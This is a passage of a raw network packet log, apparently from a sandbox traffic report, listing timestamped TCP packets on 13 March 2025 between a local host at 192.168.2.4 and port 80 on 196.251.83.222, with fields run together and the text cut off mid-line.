                                                                    Mar 13, 2025 13:58:08.164510965 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.164525032 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.164525032 CET4972080192.168.2.4196.251.83.222
                                                                    Mar 13, 2025 13:58:08.164541960 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.164561033 CET4972080192.168.2.4196.251.83.222
                                                                    Mar 13, 2025 13:58:08.164613008 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.164627075 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.164640903 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.164659023 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.164669037 CET4972080192.168.2.4196.251.83.222
                                                                    Mar 13, 2025 13:58:08.164674044 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.164701939 CET4972080192.168.2.4196.251.83.222
                                                                    Mar 13, 2025 13:58:08.164715052 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.164724112 CET4972080192.168.2.4196.251.83.222
                                                                    Mar 13, 2025 13:58:08.164731979 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.164767027 CET4972080192.168.2.4196.251.83.222
                                                                    Mar 13, 2025 13:58:08.164788008 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.164802074 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.164815903 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.164843082 CET4972080192.168.2.4196.251.83.222
                                                                    Mar 13, 2025 13:58:08.164863110 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.164877892 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.164891958 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.164910078 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.164916992 CET4972080192.168.2.4196.251.83.222
                                                                    Mar 13, 2025 13:58:08.164927006 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.164932966 CET4972080192.168.2.4196.251.83.222
                                                                    Mar 13, 2025 13:58:08.164946079 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.164972067 CET4972080192.168.2.4196.251.83.222
                                                                    Mar 13, 2025 13:58:08.164988995 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.165004015 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.165025949 CET4972080192.168.2.4196.251.83.222
                                                                    Mar 13, 2025 13:58:08.165038109 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.165051937 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.165066004 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.165076017 CET4972080192.168.2.4196.251.83.222
                                                                    Mar 13, 2025 13:58:08.165083885 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.165126085 CET4972080192.168.2.4196.251.83.222
                                                                    Mar 13, 2025 13:58:08.165141106 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.165155888 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.165164948 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.165206909 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.165210009 CET4972080192.168.2.4196.251.83.222
                                                                    Mar 13, 2025 13:58:08.165222883 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.165237904 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.165252924 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.165281057 CET4972080192.168.2.4196.251.83.222
                                                                    Mar 13, 2025 13:58:08.165298939 CET4972080192.168.2.4196.251.83.222
                                                                    Mar 13, 2025 13:58:08.165312052 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.165326118 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.165339947 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.165358067 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.165365934 CET4972080192.168.2.4196.251.83.222
                                                                    Mar 13, 2025 13:58:08.165373087 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.165391922 CET4972080192.168.2.4196.251.83.222
                                                                    Mar 13, 2025 13:58:08.165412903 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.165452003 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.165483952 CET4972080192.168.2.4196.251.83.222
                                                                    Mar 13, 2025 13:58:08.175322056 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.175335884 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.175350904 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.175375938 CET4972080192.168.2.4196.251.83.222
                                                                    Mar 13, 2025 13:58:08.175389051 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.175405025 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.175410032 CET4972080192.168.2.4196.251.83.222
                                                                    Mar 13, 2025 13:58:08.175453901 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.175455093 CET4972080192.168.2.4196.251.83.222
                                                                    Mar 13, 2025 13:58:08.175470114 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.175484896 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.175519943 CET4972080192.168.2.4196.251.83.222
                                                                    Mar 13, 2025 13:58:08.224153996 CET4972080192.168.2.4196.251.83.222
                                                                    Mar 13, 2025 13:58:08.269957066 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.269984007 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.269999981 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.270013094 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.270028114 CET4972080192.168.2.4196.251.83.222
                                                                    Mar 13, 2025 13:58:08.270045042 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2025 13:58:08.270056009 CET4972080192.168.2.4196.251.83.222
                                                                    Mar 13, 2025 13:58:08.270061016 CET8049720196.251.83.222192.168.2.4
                                                                    Mar 13, 2